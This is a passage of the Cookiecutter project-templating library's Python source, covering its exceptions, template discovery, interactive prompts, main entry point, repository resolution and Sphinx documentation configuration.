'cookiecutter.extensions.JsonifyExtension', 'cookiecutter.extensions.RandomStringExtension', 'cookiecutter.extensions.SlugifyExtension', 'cookiecutter.extensions.TimeExtension', 'cookiecutter.extensions.UUIDExtension', ] extensions = default_extensions + self._read_extensions(context) try: super().__init__(extensions=extensions, **kwargs) # type: ignore[call-arg] except ImportError as err: msg = f'Unable to load extension: {err}' raise UnknownExtension(msg) from err def _read_extensions(self, context: dict[str, Any]) -> list[str]: """Return list of extensions as str to be passed on to the Jinja2 env. If context does not contain the relevant info, return an empty list instead. """ try: extensions = context['cookiecutter']['_extensions'] except KeyError: return [] else: return [str(ext) for ext in extensions] class StrictEnvironment(ExtensionLoaderMixin, Environment): """Create strict Jinja2 environment. Jinja2 environment will raise error on undefined variable in template- rendering context. """ def __init__(self, **kwargs: Any) -> None: """Set the standard Cookiecutter StrictEnvironment. Also loading extensions defined in cookiecutter.json's _extensions key. """ super().__init__(undefined=StrictUndefined, **kwargs) File: cookiecutter/exceptions.py """All exceptions used in the Cookiecutter code base are defined here.""" from __future__ import annotations from typing import TYPE_CHECKING, Any if TYPE_CHECKING: from jinja2 import TemplateError class CookiecutterException(Exception): """ Base exception class. All Cookiecutter-specific exceptions should subclass this class. """ class NonTemplatedInputDirException(CookiecutterException): """ Exception for when a project's input dir is not templated. The name of the input directory should always contain a string that is rendered to something else, so that input_dir != output_dir. """ class UnknownTemplateDirException(CookiecutterException): """ Exception for ambiguous project template directory. Raised when Cookiecutter cannot determine which directory is the project template, e.g. more than one dir appears to be a template dir. """ # unused locally class MissingProjectDir(CookiecutterException): """ Exception for missing generated project directory. Raised during cleanup when remove_repo() can't find a generated project directory inside of a repo. """ # unused locally class ConfigDoesNotExistException(CookiecutterException): """ Exception for missing config file. Raised when get_config() is passed a path to a config file, but no file is found at that path. """ class InvalidConfiguration(CookiecutterException): """ Exception for invalid configuration file. Raised if the global configuration file is not valid YAML or is badly constructed. """ class UnknownRepoType(CookiecutterException): """ Exception for unknown repo types. Raised if a repo's type cannot be determined. """ class VCSNotInstalled(CookiecutterException): """ Exception when version control is unavailable. Raised if the version control system (git or hg) is not installed. """ class ContextDecodingException(CookiecutterException): """ Exception for failed JSON decoding. Raised when a project's JSON context file can not be decoded. """ class OutputDirExistsException(CookiecutterException): """ Exception for existing output directory. Raised when the output directory of the project exists already. """ class EmptyDirNameException(CookiecutterException): """ Exception for a empty directory name. Raised when the directory name provided is empty. """ class InvalidModeException(CookiecutterException): """ Exception for incompatible modes. Raised when cookiecutter is called with both `no_input==True` and `replay==True` at the same time. """ class FailedHookException(CookiecutterException): """ Exception for hook failures. Raised when a hook script fails. """ class UndefinedVariableInTemplate(CookiecutterException): """ Exception for out-of-scope variables. Raised when a template uses a variable which is not defined in the context. """ def __init__( self, message: str, error: TemplateError, context: dict[str, Any] ) -> None: """Exception for out-of-scope variables.""" self.message = message self.error = error self.context = context def __str__(self) -> str: """Text representation of UndefinedVariableInTemplate.""" return ( f"{self.message}. " f"Error message: {self.error.message}. " f"Context: {self.context}" ) class UnknownExtension(CookiecutterException): """ Exception for un-importable extension. Raised when an environment is unable to import a required extension. """ class RepositoryNotFound(CookiecutterException): """ Exception for missing repo. Raised when the specified cookiecutter repository doesn't exist. """ class RepositoryCloneFailed(CookiecutterException): """ Exception for un-cloneable repo. Raised when a cookiecutter template can't be cloned. """ class InvalidZipRepository(CookiecutterException): """ Exception for bad zip repo. Raised when the specified cookiecutter repository isn't a valid Zip archive. """ File: cookiecutter/find.py """Functions for finding Cookiecutter templates and other components.""" from __future__ import annotations import logging import os from pathlib import Path from typing import TYPE_CHECKING from cookiecutter.exceptions import NonTemplatedInputDirException if TYPE_CHECKING: from jinja2 import Environment logger = logging.getLogger(__name__) def find_template(repo_dir: Path | str, env: Environment) -> Path: """Determine which child directory of ``repo_dir`` is the project template. :param repo_dir: Local directory of newly cloned repo. :return: Relative path to project template. """ logger.debug('Searching %s for the project template.', repo_dir) for str_path in os.listdir(repo_dir): if ( 'cookiecutter' in str_path and env.variable_start_string in str_path and env.variable_end_string in str_path ): project_template = Path(repo_dir, str_path) break else: raise NonTemplatedInputDirException logger.debug('The project template appears to be %s', project_template) return project_template File: cookiecutter/prompt.py """Functions for prompting the user for project info.""" from __future__ import annotations import json import os import re import sys from collections import OrderedDict from itertools import starmap from pathlib import Path from typing import TYPE_CHECKING, Any, Dict, Iterator, List, Union from jinja2.exceptions import UndefinedError from rich.prompt import Confirm, InvalidResponse, Prompt, PromptBase from typing_extensions import TypeAlias from cookiecutter.exceptions import UndefinedVariableInTemplate from cookiecutter.utils import create_env_with_context, rmtree if TYPE_CHECKING: from jinja2 import Environment def read_user_variable(var_name: str, default_value, prompts=None, prefix: str = ""): """Prompt user for variable and return the entered value or given default. :param str var_name: Variable of the context to query the user :param default_value: Value that will be returned if no input happens """ question = ( prompts[var_name] if prompts and var_name in prompts and prompts[var_name] else var_name ) while True: variable = Prompt.ask(f"{prefix}{question}", default=default_value) if variable is not None: break return variable class YesNoPrompt(Confirm): """A prompt that returns a boolean for yes/no questions.""" yes_choices = ["1", "true", "t", "yes", "y", "on"] no_choices = ["0", "false", "f", "no", "n", "off"] def process_response(self, value: str) -> bool: """Convert choices to a bool.""" value = value.strip().lower() if value in self.yes_choices: return True if value in self.no_choices: return False raise InvalidResponse(self.validate_error_message) def read_user_yes_no(var_name, default_value, prompts=None, prefix: str = ""): """Prompt the user to reply with 'yes' or 'no' (or equivalent values). - These input values will be converted to ``True``: "1", "true", "t", "yes", "y", "on" - These input values will be converted to ``False``: "0", "false", "f", "no", "n", "off" Actual parsing done by :func:`prompt`; Check this function codebase change in case of unexpected behaviour. :param str question: Question to the user :param default_value: Value that will be returned if no input happens """ question = ( prompts[var_name] if prompts and var_name in prompts and prompts[var_name] else var_name ) return YesNoPrompt.ask(f"{prefix}{question}", default=default_value) def read_repo_password(question: str) -> str: """Prompt the user to enter a password. :param question: Question to the user """ return Prompt.ask(question, password=True) def read_user_choice(var_name: str, options: list, prompts=None, prefix: str = ""): """Prompt the user to choose from several options for the given variable. The first item will be returned if no input happens. :param var_name: Variable as specified in the context :param list options: Sequence of options that are available to select from :return: Exactly one item of ``options`` that has been chosen by the user """ if not options: raise ValueError choice_map = OrderedDict((f'{i}', value) for i, value in enumerate(options, 1)) choices = choice_map.keys() question = f"Select {var_name}" choice_lines: Iterator[str] = starmap( " [bold magenta]{}[/] - [bold]{}[/]".format, choice_map.items() ) # Handle if human-readable prompt is provided if prompts and var_name in prompts: if isinstance(prompts[var_name], str): question = prompts[var_name] else: if "__prompt__" in prompts[var_name]: question = prompts[var_name]["__prompt__"] choice_lines = ( f" [bold magenta]{i}[/] - [bold]{prompts[var_name][p]}[/]" if p in prompts[var_name] else f" [bold magenta]{i}[/] - [bold]{p}[/]" for i, p in choice_map.items() ) prompt = '\n'.join( ( f"{prefix}{question}", "\n".join(choice_lines), " Choose from", ) ) user_choice = Prompt.ask(prompt, choices=list(choices), default=next(iter(choices))) return choice_map[user_choice] DEFAULT_DISPLAY = 'default' def process_json(user_value: str): """Load user-supplied value as a JSON dict. :param user_value: User-supplied value to load as a JSON dict """ try: user_dict = json.loads(user_value, object_pairs_hook=OrderedDict) except Exception as error: # Leave it up to click to ask the user again msg = 'Unable to decode to JSON.' raise InvalidResponse(msg) from error if not isinstance(user_dict, dict): # Leave it up to click to ask the user again msg = 'Requires JSON dict.' raise InvalidResponse(msg) return user_dict class JsonPrompt(PromptBase[dict]): """A prompt that returns a dict from JSON string.""" default = None response_type = dict validate_error_message = "[prompt.invalid] Please enter a valid JSON string" @staticmethod def process_response(value: str) -> dict[str, Any]: """Convert choices to a dict.""" return process_json(value) def read_user_dict(var_name: str, default_value, prompts=None, prefix: str = ""): """Prompt the user to provide a dictionary of data. :param var_name: Variable as specified in the context :param default_value: Value that will be returned if no input is provided :return: A Python dictionary to use in the context. """ if not isinstance(default_value, dict): raise TypeError question = ( prompts[var_name] if prompts and var_name in prompts and prompts[var_name] else var_name ) return JsonPrompt.ask( f"{prefix}{question} [cyan bold]({DEFAULT_DISPLAY})[/]", default=default_value, show_default=False, ) _Raw: TypeAlias = Union[bool, Dict["_Raw", "_Raw"], List["_Raw"], str, None] def render_variable( env: Environment, raw: _Raw, cookiecutter_dict: dict[str, Any], ) -> str: """Render the next variable to be displayed in the user prompt. Inside the prompting taken from the cookiecutter.json file, this renders the next variable. For example, if a project_name is "Peanut Butter Cookie", the repo_name could be be rendered with: `{{ cookiecutter.project_name.replace(" ", "_") }}`. This is then presented to the user as the default. :param Environment env: A Jinja2 Environment object. :param raw: The next value to be prompted for by the user. :param dict cookiecutter_dict: The current context as it's gradually being populated with variables. :return: The rendered value for the default variable. """ if raw is None or isinstance(raw, bool): return raw if isinstance(raw, dict): return { render_variable(env, k, cookiecutter_dict): render_variable( env, v, cookiecutter_dict ) for k, v in raw.items() } if isinstance(raw, list): return [render_variable(env, v, cookiecutter_dict) for v in raw] if not isinstance(raw, str): raw = str(raw) template = env.from_string(raw) return template.render(cookiecutter=cookiecutter_dict) def _prompts_from_options(options: dict) -> dict: """Process template options and return friendly prompt information.""" prompts = {"__prompt__": "Select a template"} for option_key, option_value in options.items(): title = str(option_value.get("title", option_key)) description = option_value.get("description", option_key) label = title if title == description else f"{title} ({description})" prompts[option_key] = label return prompts def prompt_choice_for_template( key: str, options: dict, no_input: bool ) -> OrderedDict[str, Any]: """Prompt user with a set of options to choose from. :param no_input: Do not prompt for user input and return the first available option. """ opts = list(options.keys()) prompts = {"templates": _prompts_from_options(options)} return opts[0] if no_input else read_user_choice(key, opts, prompts, "") def prompt_choice_for_config( cookiecutter_dict: dict[str, Any], env: Environment, key: str, options, no_input: bool, prompts=None, prefix: str = "", ) -> OrderedDict[str, Any] | str: """Prompt user with a set of options to choose from. :param no_input: Do not prompt for user input and return the first available option. """ rendered_options = [render_variable(env, raw, cookiecutter_dict) for raw in options] if no_input: return rendered_options[0] return read_user_choice(key, rendered_options, prompts, prefix) def prompt_for_config( context: dict[str, Any], no_input: bool = False ) -> OrderedDict[str, Any]: """Prompt user to enter a new config. :param dict context: Source for field names and sample values. :param no_input: Do not prompt for user input and use only values from context. """ cookiecutter_dict = OrderedDict([]) env = create_env_with_context(context) prompts = context['cookiecutter'].pop('__prompts__', {}) # First pass: Handle simple and raw variables, plus choices. # These must be done first because the dictionaries keys and # values might refer to them. count = 0 all_prompts = context['cookiecutter'].items() visible_prompts = [k for k, _ in all_prompts if not k.startswith("_")] size = len(visible_prompts) for key, raw in all_prompts: if key.startswith('_') and not key.startswith('__'): cookiecutter_dict[key] = raw continue if key.startswith('__'): cookiecutter_dict[key] = render_variable(env, raw, cookiecutter_dict) continue if not isinstance(raw, dict): count += 1 prefix = f" [dim][{count}/{size}][/] " try: if isinstance(raw, list): # We are dealing with a choice variable val = prompt_choice_for_config( cookiecutter_dict, env, key, raw, no_input, prompts, prefix ) cookiecutter_dict[key] = val elif isinstance(raw, bool): # We are dealing with a boolean variable if no_input: cookiecutter_dict[key] = render_variable( env, raw, cookiecutter_dict ) else: cookiecutter_dict[key] = read_user_yes_no(key, raw, prompts, prefix) elif not isinstance(raw, dict): # We are dealing with a regular variable val = render_variable(env, raw, cookiecutter_dict) if not no_input: val = read_user_variable(key, val, prompts, prefix) cookiecutter_dict[key] = val except UndefinedError as err: msg = f"Unable to render variable '{key}'" raise UndefinedVariableInTemplate(msg, err, context) from err # Second pass; handle the dictionaries. for key, raw in context['cookiecutter'].items(): # Skip private type dicts not to be rendered. if key.startswith('_') and not key.startswith('__'): continue try: if isinstance(raw, dict): # We are dealing with a dict variable count += 1 prefix = f" [dim][{count}/{size}][/] " val = render_variable(env, raw, cookiecutter_dict) if not no_input and not key.startswith('__'): val = read_user_dict(key, val, prompts, prefix) cookiecutter_dict[key] = val except UndefinedError as err: msg = f"Unable to render variable '{key}'" raise UndefinedVariableInTemplate(msg, err, context) from err return cookiecutter_dict def choose_nested_template( context: dict[str, Any], repo_dir: Path | str, no_input: bool = False ) -> str: """Prompt user to select the nested template to use. :param context: Source for field names and sample values. :param repo_dir: Repository directory. :param no_input: Do not prompt for user input and use only values from context. :returns: Path to the selected template. """ cookiecutter_dict: OrderedDict[str, Any] = OrderedDict([]) env = create_env_with_context(context) prefix = "" prompts = context['cookiecutter'].pop('__prompts__', {}) key = "templates" config = context['cookiecutter'].get(key, {}) if config: # Pass val = prompt_choice_for_template(key, config, no_input) template = config[val]["path"] else: # Old style key = "template" config = context['cookiecutter'].get(key, []) val = prompt_choice_for_config( cookiecutter_dict, env, key, config, no_input, prompts, prefix ) template = re.search(r'\((.+)\)', val).group(1) template = Path(template) if template else None if not (template and not template.is_absolute()): msg = "Illegal template path" raise ValueError(msg) repo_dir = Path(repo_dir).resolve() template_path = (repo_dir / template).resolve() # Return path as string return f"{template_path}" def prompt_and_delete(path: Path | str, no_input: bool = False) -> bool: """ Ask user if it's okay to delete the previously-downloaded file/directory. If yes, delete it. If no, checks to see if the old version should be reused. If yes, it's reused; otherwise, Cookiecutter exits. :param path: Previously downloaded zipfile. :param no_input: Suppress prompt to delete repo and just delete it. :return: True if the content was deleted """ # Suppress prompt if called via API if no_input: ok_to_delete = True else: question = ( f"You've downloaded {path} before. Is it okay to delete and re-download it?" ) ok_to_delete = read_user_yes_no(question, 'yes') if ok_to_delete: if os.path.isdir(path): rmtree(path) else: os.remove(path) return True ok_to_reuse = read_user_yes_no("Do you want to re-use the existing version?", 'yes') if ok_to_reuse: return False sys.exit() File: cookiecutter/main.py """ Main entry point for the `cookiecutter` command. The code in this module is also a good example of how to use Cookiecutter as a library rather than a script. """ from __future__ import annotations import logging import os import sys from copy import copy from pathlib import Path from typing import Any from cookiecutter.config import get_user_config from cookiecutter.exceptions import InvalidModeException from cookiecutter.generate import generate_context, generate_files from cookiecutter.hooks import run_pre_prompt_hook from cookiecutter.prompt import choose_nested_template, prompt_for_config from cookiecutter.replay import dump, load from cookiecutter.repository import determine_repo_dir from cookiecutter.utils import rmtree logger = logging.getLogger(__name__) def cookiecutter( template: str, checkout: str | None = None, no_input: bool = False, extra_context: dict[str, Any] | None = None, replay: bool | str | None = None, overwrite_if_exists: bool = False, output_dir: str = '.', config_file: str | None = None, default_config: bool = False, password: str | None = None, directory: str | None = None, skip_if_file_exists: bool = False, accept_hooks: bool = True, keep_project_on_failure: bool = False, ) -> str: """ Run Cookiecutter just as if using it from the command line. :param template: A directory containing a project template directory, or a URL to a git repository. :param checkout: The branch, tag or commit ID to checkout after clone. :param no_input: Do not prompt for user input. Use default values for template parameters taken from `cookiecutter.json`, user config and `extra_dict`. Force a refresh of cached resources. :param extra_context: A dictionary of context that overrides default and user configuration. :param replay: Do not prompt for input, instead read from saved json. If ``True`` read from the ``replay_dir``. if it exists :param overwrite_if_exists: Overwrite the contents of the output directory if it exists. :param output_dir: Where to output the generated project dir into. :param config_file: User configuration file path. :param default_config: Use default values rather than a config file. :param password: The password to use when extracting the repository. :param directory: Relative path to a cookiecutter template in a repository. :param skip_if_file_exists: Skip the files in the corresponding directories if they already exist. :param accept_hooks: Accept pre and post hooks if set to `True`. :param keep_project_on_failure: If `True` keep generated project directory even when generation fails """ if replay and ((no_input is not False) or (extra_context is not None)): err_msg = ( "You can not use both replay and no_input or extra_context " "at the same time." ) raise InvalidModeException(err_msg) config_dict = get_user_config( config_file=config_file, default_config=default_config, ) base_repo_dir, cleanup_base_repo_dir = determine_repo_dir( template=template, abbreviations=config_dict['abbreviations'], clone_to_dir=config_dict['cookiecutters_dir'], checkout=checkout, no_input=no_input, password=password, directory=directory, ) repo_dir, cleanup = base_repo_dir, cleanup_base_repo_dir # Run pre_prompt hook repo_dir = str(run_pre_prompt_hook(base_repo_dir)) if accept_hooks else repo_dir # Always remove temporary dir if it was created cleanup = repo_dir != base_repo_dir import_patch = _patch_import_path_for_repo(repo_dir) template_name = os.path.basename(os.path.abspath(repo_dir)) if replay: with import_patch: if isinstance(replay, bool): context_from_replayfile = load(config_dict['replay_dir'], template_name) else: path, template_name = os.path.split(os.path.splitext(replay)[0]) context_from_replayfile = load(path, template_name) context_file = os.path.join(repo_dir, 'cookiecutter.json') logger.debug('context_file is %s', context_file) if replay: context = generate_context( context_file=context_file, default_context=config_dict['default_context'], extra_context=None, ) logger.debug('replayfile context: %s', context_from_replayfile) items_for_prompting = { k: v for k, v in context['cookiecutter'].items() if k not in context_from_replayfile['cookiecutter'] } context_for_prompting = {} context_for_prompting['cookiecutter'] = items_for_prompting context = context_from_replayfile logger.debug('prompting context: %s', context_for_prompting) else: context = generate_context( context_file=context_file, default_context=config_dict['default_context'], extra_context=extra_context, ) context_for_prompting = context # preserve the original cookiecutter options # print(context['cookiecutter']) context['_cookiecutter'] = { k: v for k, v in context['cookiecutter'].items() if not k.startswith("_") } # prompt the user to manually configure at the command line. # except when 'no-input' flag is set with import_patch: if {"template", "templates"} & set(context["cookiecutter"].keys()): nested_template = choose_nested_template(context, repo_dir, no_input) return cookiecutter( template=nested_template, checkout=checkout, no_input=no_input, extra_context=extra_context, replay=replay, overwrite_if_exists=overwrite_if_exists, output_dir=output_dir, config_file=config_file, default_config=default_config, password=password, directory=directory, skip_if_file_exists=skip_if_file_exists, accept_hooks=accept_hooks, keep_project_on_failure=keep_project_on_failure, ) if context_for_prompting['cookiecutter']: context['cookiecutter'].update( prompt_for_config(context_for_prompting, no_input) ) logger.debug('context is %s', context) # include template dir or url in the context dict context['cookiecutter']['_template'] = template # include output+dir in the context dict context['cookiecutter']['_output_dir'] = os.path.abspath(output_dir) # include repo dir or url in the context dict context['cookiecutter']['_repo_dir'] = f"{repo_dir}" # include checkout details in the context dict context['cookiecutter']['_checkout'] = checkout dump(config_dict['replay_dir'], template_name, context) # Create project from local context and project template. with import_patch: result = generate_files( repo_dir=repo_dir, context=context, overwrite_if_exists=overwrite_if_exists, skip_if_file_exists=skip_if_file_exists, output_dir=output_dir, accept_hooks=accept_hooks, keep_project_on_failure=keep_project_on_failure, ) # Cleanup (if required) if cleanup: rmtree(repo_dir) if cleanup_base_repo_dir: rmtree(base_repo_dir) return result class _patch_import_path_for_repo: # noqa: N801 def __init__(self, repo_dir: Path | str) -> None: self._repo_dir = f"{repo_dir}" if isinstance(repo_dir, Path) else repo_dir def __enter__(self) -> None: self._path = copy(sys.path) sys.path.append(self._repo_dir) def __exit__(self, _type, _value, _traceback): # type: ignore[no-untyped-def] sys.path = self._path File: cookiecutter/repository.py """Cookiecutter repository functions.""" from __future__ import annotations import os import re from typing import TYPE_CHECKING from cookiecutter.exceptions import RepositoryNotFound from cookiecutter.vcs import clone from cookiecutter.zipfile import unzip if TYPE_CHECKING: from pathlib import Path REPO_REGEX = re.compile( r""" # something like git:// ssh:// file:// etc. ((((git|hg)\+)?(git|ssh|file|https?):(//)?) | # or (\w+@[\w\.]+) # something like user@... ) """, re.VERBOSE, ) def is_repo_url(value: str) -> bool: """Return True if value is a repository URL.""" return bool(REPO_REGEX.match(value)) def is_zip_file(value: str) -> bool: """Return True if value is a zip file.""" return value.lower().endswith('.zip') def expand_abbreviations(template: str, abbreviations: dict[str, str]) -> str: """Expand abbreviations in a template name. :param template: The project template name. :param abbreviations: Abbreviation definitions. """ if template in abbreviations: return abbreviations[template] # Split on colon. If there is no colon, rest will be empty # and prefix will be the whole template prefix, _sep, rest = template.partition(':') if prefix in abbreviations: return abbreviations[prefix].format(rest) return template def repository_has_cookiecutter_json(repo_directory: str) -> bool: """Determine if `repo_directory` contains a `cookiecutter.json` file. :param repo_directory: The candidate repository directory. :return: True if the `repo_directory` is valid, else False. """ repo_directory_exists = os.path.isdir(repo_directory) repo_config_exists = os.path.isfile( os.path.join(repo_directory, 'cookiecutter.json') ) return repo_directory_exists and repo_config_exists def determine_repo_dir( template: str, abbreviations: dict[str, str], clone_to_dir: Path | str, checkout: str | None, no_input: bool, password: str | None = None, directory: str | None = None, ) -> tuple[str, bool]: """ Locate the repository directory from a template reference. Applies repository abbreviations to the template reference. If the template refers to a repository URL, clone it. If the template is a path to a local repository, use it. :param template: A directory containing a project template directory, or a URL to a git repository. :param abbreviations: A dictionary of repository abbreviation definitions. :param clone_to_dir: The directory to clone the repository into. :param checkout: The branch, tag or commit ID to checkout after clone. :param no_input: Do not prompt for user input and eventually force a refresh of cached resources. :param password: The password to use when extracting the repository. :param directory: Directory within repo where cookiecutter.json lives. :return: A tuple containing the cookiecutter template directory, and a boolean describing whether that directory should be cleaned up after the template has been instantiated. :raises: `RepositoryNotFound` if a repository directory could not be found. """ template = expand_abbreviations(template, abbreviations) if is_zip_file(template): unzipped_dir = unzip( zip_uri=template, is_url=is_repo_url(template), clone_to_dir=clone_to_dir, no_input=no_input, password=password, ) repository_candidates = [unzipped_dir] cleanup = True elif is_repo_url(template): cloned_repo = clone( repo_url=template, checkout=checkout, clone_to_dir=clone_to_dir, no_input=no_input, ) repository_candidates = [cloned_repo] cleanup = False else: repository_candidates = [template, os.path.join(clone_to_dir, template)] cleanup = False if directory: repository_candidates = [ os.path.join(s, directory) for s in repository_candidates ] for repo_candidate in repository_candidates: if repository_has_cookiecutter_json(repo_candidate): return repo_candidate, cleanup msg = ( 'A valid repository for "{}" could not be found in the following ' 'locations:\n{}'.format(template, '\n'.join(repository_candidates)) ) raise RepositoryNotFound(msg) File: cookiecutter/__main__.py """Allow cookiecutter to be executable through `python -m cookiecutter`.""" from cookiecutter.cli import main if __name__ == "__main__": main(prog_name="cookiecutter") File: docs/conf.py """Documentation build configuration file.""" # # cookiecutter documentation build configuration file, created by # sphinx-quickstart on Thu Jul 11 11:31:49 2013. # # This file is execfile()d with the current directory set to its containing # dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import os import sys # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # sys.path.insert(0, os.path.abspath('.')) # For building docs in foreign environments where we don't have all our # dependencies (like readthedocs), mock out imports that cause sphinx to fail. # see: https://docs.readthedocs.io/en/latest/faq.html#i-get-import-errors-on-libraries-that-depend-on-c-modules # Add parent dir to path cwd = os.getcwd() parent = os.path.dirname(cwd) sys.path.append(parent) import cookiecutter # noqa: E402 # -- General configuration ---------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or # your custom ones. extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'sphinx.ext.imgmath', 'sphinx.ext.ifconfig', 'sphinx.ext.viewcode', 'sphinx_click.ext', 'myst_parser', 'sphinxcontrib.apidoc', 'sphinx_autodoc_typehints', ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = {'.rst': 'restructuredtext', '.md': 'markdown'} # The encoding of source files. # source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = 'cookiecutter' copyright = '2013-2022, Audrey Roy and Cookiecutter community' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = cookiecutter.__version__ # The full version, including alpha/beta/rc tags. release = cookiecutter.__version__ # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: # today = '' # Else, today_fmt is used as the format for a strftime call. # today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build'] # The reST default role (used for this markup: `text`) to use for all documents # default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. # add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). # add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. # show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. # modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. # keep_warnings = False # Suppress nonlocal image warnings suppress_warnings = ['image.nonlocal_uri'] # -- Options for HTML output -------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'sphinx_rtd_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. # html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". # html_title = None # A shorter title for the navigation bar. Default is the same as html_title. # html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. # html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. # html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. # html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. # html_use_smartypants = True # Custom sidebar templates, maps document names to template names. # html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. # html_additional_pages = {} # If false, no module index is generated. # html_domain_indices = True # If false, no index is generated. # html_use_index = True # If true, the index is split into individual pages for each letter. # html_split_index = False # If true, links to the reST sources are added to the pages. # html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. # html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. # html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. # html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). # html_file_suffix = None # Output file base name for HTML help builder. htmlhelp_basename = 'cookiecutterdoc' # -- Options for LaTeX output ------------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # 'preamble': '', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass [howto/manual]) latex_documents = [ ( 'index', 'cookiecutter.tex', 'cookiecutter Documentation', 'Audrey Roy and Cookiecutter community', 'manual', ), ] # The name of an image file (relative to this directory) to place at the top of # the title page. # latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. # latex_use_parts = False # If true, show page references after internal links. # latex_show_pagerefs = False # If true, show URL addresses after external links. # latex_show_urls = False # Documents to append as an appendix to all manuals. # latex_appendices = [] # If false, no module index is generated. # latex_domain_indices = True # -- Options for manual page output ------------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ( 'index', 'cookiecutter', 'cookiecutter Documentation', ['Audrey Roy and Cookiecutter community'], 1, ) ] # If true, show URL addresses after external links. # man_show_urls = False # -- Options for Texinfo output ----------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ( 'index', 'cookiecutter', 'cookiecutter Documentation', 'Audrey Roy and Cookiecutter community', 'cookiecutter', 'Creates projects from project templates', 'Miscellaneous', ), ] # Documents to append as an appendix to all manuals. # texinfo_appendices = [] # If false, no module index is generated. # texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. # texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. # texinfo_no_detailmenu = False # -- Options for Epub output -------------------------------------------------- # Bibliographic Dublin Core info. epub_title = 'cookiecutter' epub_author = 'Audrey Roy' epub_publisher = 'Audrey Roy and Cookiecutter community' epub_copyright = '2013-2022, Audrey Roy and Cookiecutter community' # The language of the text. It defaults to the language option # or en if the language is not set. # epub_language = '' # The scheme of the identifier. Typical schemes are ISBN or URL. # epub_scheme = '' # The unique identifier of the text. This can be a ISBN number # or the project homepage. # epub_identifier = '' # A unique identification for the text. # epub_uid = '' # A tuple containing the cover image and cover page html template filenames. # epub_cover = () # A sequence of (type, uri, title) tuples for the guide element of content.opf. # epub_guide = () # HTML files that should be inserted before the pages created by sphinx. # The format is a list of tuples containing the path and title. # epub_pre_files = [] # HTML files that should be inserted after the pages created by sphinx. # The format is a list of tuples containing the path and title. # epub_post_files = [] # A list of files that should not be packed into the epub file. # epub_exclude_files = [] # The depth of the table of contents in toc.ncx. # epub_tocdepth = 3 # Allow duplicate toc entries. # epub_tocdup = True # Fix unsupported image types using the PIL. # epub_fix_images = False # Scale large images. # epub_max_image_width = 0 # If 'no', URL addresses will not be shown. # epub_show_urls = 'inline' # If false, no index is generated. # epub_use_index = True # Example configuration for intersphinx: refer to the Python standard library. intersphinx_mapping = { "python": ("https://docs.python.org/3", None), "requests": ("https://requests.readthedocs.io/en/latest/", None), "click": ("https://click.palletsprojects.com/en/latest", None), } myst_enable_extensions = [ "tasklist", "strikethrough", "fieldlist", ] myst_heading_anchors = 3 # Apidoc extension config apidoc_module_dir = "../cookiecutter" apidoc_output_dir = "." apidoc_toc_file = False apidoc_extra_args = ["-t", "_templates"] autodoc_member_order = "groupwise" autodoc_typehints = "none" File: docs/__init__.py """Main package for docs."""
